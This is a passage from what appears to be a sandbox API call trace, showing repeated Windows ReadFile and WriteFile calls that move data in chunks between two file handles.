lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.213] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.213] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.213] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ee, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.214] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.214] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x226, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.215] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.215] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x343, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.216] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.216] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.217] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.217] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.218] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.218] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.219] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.219] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.220] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.220] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.221] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.221] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.222] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.222] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x291, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.222] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.223] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x389, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.224] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.224] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x308, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.225] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.225] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.226] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.226] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x297, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.227] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.227] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.228] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.228] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.228] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.229] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.230] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.230] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x292, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.230] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.231] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x372, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.231] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.232] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.232] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.233] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ca, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.233] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.234] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x267, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.234] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.235] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.235] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.236] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.236] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.237] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x23b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.237] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.238] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.238] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.239] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x246, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.239] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.240] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.240] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.241] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.241] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.242] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.242] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.243] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.243] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.244] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.244] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.245] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.245] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.246] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x264, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.246] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.247] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.247] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.248] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.248] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.249] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.249] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.250] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x253, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.250] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.250] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x23b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.251] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.251] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.252] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.252] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.253] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.253] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.254] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.254] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.255] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.255] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x271, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.256] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.256] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.257] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.257] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.257] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.258] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x268, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.258] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.259] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.259] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.260] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x272, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, 